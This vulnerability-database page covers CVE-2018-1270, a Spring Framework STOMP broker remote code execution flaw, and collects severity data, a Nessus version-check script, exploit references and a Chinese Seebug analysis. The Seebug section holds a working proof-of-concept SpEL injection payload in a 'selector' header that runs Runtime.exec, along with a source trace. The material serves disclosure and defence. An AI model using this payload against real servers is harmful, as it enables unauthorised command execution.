Vulnerabilities > CVE-2018-1270 - Code Injection vulnerability in multiple products

047910
CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
vmware
oracle
redhat
debian
CWE-94
critical
nessus
exploit available
NVD
Published: 2018-04-06
Updated: 2023-11-07

Summary

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.

Vulnerable Configurations

Part Description Count
Application
Vmware
120
Application
Oracle
78
Application
Redhat
1
OS
Debian
1

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
  • Manipulating User-Controlled Variables
    This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.

Exploit-Db

  • descriptionPivotal Spring Java Framework < 5.0 - Remote Code Execution. CVE-2018-1270. Webapps exploit for Java platform
    idEDB-ID:44796
    last seen2018-05-29
    modified2018-05-29
    published2018-05-29
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/44796/
    titlePivotal Spring Java Framework < 5.0 - Remote Code Execution
  • idEDB-ID:44796

Nessus

NASL familyMisc.
NASL idSPRING_CVE-2018-1270.NASL
descriptionThe remote host contains a Spring Framework library version that is 4.3.x prior to 4.3.16 or 5.0.x prior to 5.0.5. It is, therefore, affected by a remote code execution vulnerability. An unauthenticated, remote attacker can exploit this, by sending a special craft message to the broker that can lead to RCE attack
last seen2020-06-01
modified2020-06-02
plugin id129500
published2019-10-02
reporterThis script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/129500
titleSpring Framework 4.3.x < 4.3.16 / 5.0.x < 5.0.5 Remote Code Execution with spring-messaging (CVE-2018-1270)
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(129500);
  script_version("1.2");
  script_cvs_date("Date: 2019/10/04  9:39:50");

  script_cve_id("CVE-2018-1270");

  script_name(english:"Spring Framework 4.3.x < 4.3.16 / 5.0.x < 5.0.5 Remote Code Execution with spring-messaging (CVE-2018-1270)");
  script_summary(english:"Checks version of Spring Framework.");

  script_set_attribute(attribute:"synopsis", value:
"The remote Windows host contains a web application framework library that is
affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host contains a Spring Framework library version that is
4.3.x prior to 4.3.16 or 5.0.x prior to 5.0.5. It is, therefore,
affected by a remote code execution vulnerability. An unauthenticated,
remote attacker can exploit this, by sending a special craft message
to the broker that can lead to RCE attack");

  # https://pivotal.io/security/cve-2018-1270
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c6875af7");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Spring Framework version 4.3.16 or 5.0.5 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-1270");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/05");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/04/05");
  script_set_attribute(attribute:"plugin_publication_date", value:"2019/10/02");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:pivotal_software:spring_framework");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("spring_jar_detection.nbin");
  exit(0);
}

include("vcf.inc");

app_info = vcf::combined_get_app_info(app:'Spring Framework');

constraints = [
  { 'min_version':'4.3', 'fixed_version':'4.3.16' },
  { 'min_version':'5.0', 'fixed_version':'5.0.5' }
];

vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/147974/psjf-exec.txt
idPACKETSTORM:147974
last seen2018-05-31
published2018-05-29
reporterJameelNabbo
sourcehttps://packetstormsecurity.com/files/147974/Pivotal-Spring-Java-Framework-5.0.x-Remote-Code-Execution.html
titlePivotal Spring Java Framework 5.0.x Remote Code Execution

Redhat

advisories
rhsa
idRHSA-2018:2939

Seebug

bulletinFamilyexploit
description### 漏洞公告 2018年4月5日漏洞公布: https://pivotal.io/security/cve-2018-1270 ![](https://images.seebug.org/1523153473144) ### 漏洞影响版本: * Spring Framework 5.0 to 5.0.4 * Spring Framework 4.3 to 4.3.14 * Older unsupported versions are also affected ### 环境搭建 利用官方示例 https://github.com/spring-guides/gs-messaging-stomp-websocket ,git clone后checkout到未更新版本: ``` git clone https://github.com/spring-guides/gs-messaging-stomp-websocket git checkout 6958af0b02bf05282673826b73cd7a85e84c12d3 ``` 用IDEA打开gs-messaging-stomp-websocket目录下的complete项目,修改app.js中的第15行: ``` function connect() { var header = {"selector":"T(java.lang.Runtime).getRuntime().exec('calc.exe')"}; var socket = new SockJS('/gs-guide-websocket'); stompClient = Stomp.over(socket); stompClient.connect({}, function (frame) { setConnected(true); console.log('Connected: ' + frame); stompClient.subscribe('/topic/greetings', function (greeting) { showGreeting(JSON.parse(greeting.body).content); },header); }); } ``` 增加了一个header头部,其中指定了selector,其值即payload。 ### 漏洞利用 点击connect后建立起连接,在文本框中随意输入,点击Send,触发poc: ![](https://images.seebug.org/1523153519476) ### 漏洞分析 当在 http://localhost:8080/ 中点击Connect后,在app.js中,有如下代码,会建立起Websocket连接: ``` var header = {"selector":"T(java.lang.Runtime).getRuntime().exec('calc.exe')"}; ... stompClient.subscribe('/topic/greetings', function (greeting) { showGreeting(JSON.parse(greeting.body).content); },header); ``` 其中`header`中指定了`selector`,根据 Stomp Protocol Specification, Version 1.0,通过指定对应的selecttor,可以对订阅的信息进行过滤: ``` Stomp brokers may support the selector header which allows you to specify an SQL 92 selector on the message headers which acts as a filter for content based routing. You can also specify an id header which can then later on be used to UNSUBSCRIBE from the specific subscription as you may end up with overlapping subscriptions using selectors with the same destination. If an id header is supplied then Stomp brokers should append a subscription header to any MESSAGE commands which are sent to the client so that the client knows which subscription the message relates to. If using Wildcards and selectors this can help clients figure out what subscription caused the message to be created. ``` 在 org/springframework/messaging/simp/broker/DefaultSubscriptionRegistry.java 第140行,对这个header参数进行了接受和处理: ``` protected void addSubscriptionInternal( String sessionId, String subsId, String destination, Message<?> message) { Expression expression = null; MessageHeaders headers = message.getHeaders(); String selector = SimpMessageHeaderAccessor.getFirstNativeHeader(getSelectorHeaderName(), headers); if (selector != null) { try { expression = this.expressionParser.parseExpression(selector); this.selectorHeaderInUse = true; if (logger.isTraceEnabled()) { logger.trace("Subscription selector: [" + selector + "]"); } } catch (Throwable ex) { if (logger.isDebugEnabled()) { logger.debug("Failed to parse selector: " + selector, ex); } } } this.subscriptionRegistry.addSubscription(sessionId, subsId, destination, expression); this.destinationCache.updateAfterNewSubscription(destination, sessionId, subsId); } ``` ![](https://images.seebug.org/1523153570687) 如图所示,此次连接对应的sessionId为`mrzfa005`,subsId为`sub-0`。 之后,在 http://localhost:8080/ 中输入任意字符串,点击send。spring进行了一系列处理后,开始向消息的订阅者分发消息,在 org/springframework/messaging/simp/broker/SimpleBrokerMessageHandler.java:349 行: ``` protected void sendMessageToSubscribers(@Nullable String destination, Message<?> message) { MultiValueMap<String,String> subscriptions = this.subscriptionRegistry.findSubscriptions(message); ... ``` 其中message保存了此次连接/会话的相关信息: ![](https://images.seebug.org/1523153607905) 跟入 `this.subscriptionRegistry.findSubscriptions` 至 org/springframework/messaging/simp/broker/AbstractSubscriptionRegistry.java:111 行: ``` public final MultiValueMap<String, String> findSubscriptions(Message<?> message) { .... return findSubscriptionsInternal(destination, message); } ``` message作为参数被传入 `findSubscriptionsInternal` ,在return处继续跟进至 org/springframework/messaging/simp/broker/DefaultSubscriptionRegistry.java:184行 ``` protected MultiValueMap<String, String> findSubscriptionsInternal(String destination, Message<?> message) { MultiValueMap<String, String> result = this.destinationCache.getSubscriptions(destination, message); return filterSubscriptions(result, message); } ``` 其中result变量值如下: ![](https://images.seebug.org/1523153643703) 该变量即 org/springframework/messaging/simp/broker/DefaultSubscriptionRegistry.java:201行的filterSubscriptions方法的allMatches变量,跟进至两层for循环 ``` for (String sessionId : allMatches.keySet()) { for (String subId : allMatches.get(sessionId)) { SessionSubscriptionInfo info = this.subscriptionRegistry.getSubscriptions(sessionId); if (info == null) { continue; } Subscription sub = info.getSubscription(subId); if (sub == null) { continue; } ... } } ``` 通过两次`getSubscriptions`操作,此时取出了先前的配置信息,sub变量值如下: ![](https://images.seebug.org/1523153691361) 接下去第 207 行将selector表达式取出: ``` Expression expression = sub.getSelectorExpression(); ``` 第217行: ``` try { if (Boolean.TRUE.equals(expression.getValue(context, Boolean.class))) { result.add(sessionId, subId); } } ``` 通过调用了expression.getValue(context, Boolean.class),触发payload,执行了spel表达式,远程命令执行成功。 ![](https://images.seebug.org/1523153719709)
idSSV:97214
last seen2018-06-26
modified2018-04-08
published2018-04-08
reporterMy Seebug
titlespring-messaging Remote Code Execution(CVE-2018-1270)

The Hacker News

idTHN:D7C30FB307A1DC524FADFFBF2D1BEAB1
last seen2018-04-06
modified2018-04-06
published2018-04-05
reporterSwati Khandelwal
sourcehttps://thehackernews.com/2018/04/spring-framework-hacking.html
titleRemote Execution Flaw Threatens Apps Built Using Spring Framework — Patch Now

References